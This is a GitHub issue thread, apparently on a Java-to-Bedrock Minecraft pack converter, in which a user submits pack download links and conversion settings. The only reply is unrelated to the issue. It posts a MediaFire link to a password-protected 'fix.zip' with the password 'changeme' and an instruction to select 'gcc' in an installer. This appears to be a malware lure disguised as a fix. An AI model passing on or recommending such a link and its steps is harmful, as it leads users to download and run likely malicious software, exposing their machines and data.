### ISSUE TITLE
[Pack]: ssss

### ISSUE THREAD

**Issue by Mysticalz420** [Kas-tle/java2bedrock.sh#33488]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/nw8xls78uskrqkdx9jhw1/pack2Aug28.zip?rlkey=977raquesy2iciqx5iyutkcv1&st=s1s1z3zk&dl=1

### Bedrock Merge Pack Direct Download URL

https://www.dropbox.com/scl/fi/fm6secj0p4l4qkeps0d8o/Icon-pack.mcpack?rlkey=38wquhklb97lgjb09h0jiowt9&st=3r8ye6ak&dl=1

### Default Assets Version

1.20.1

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
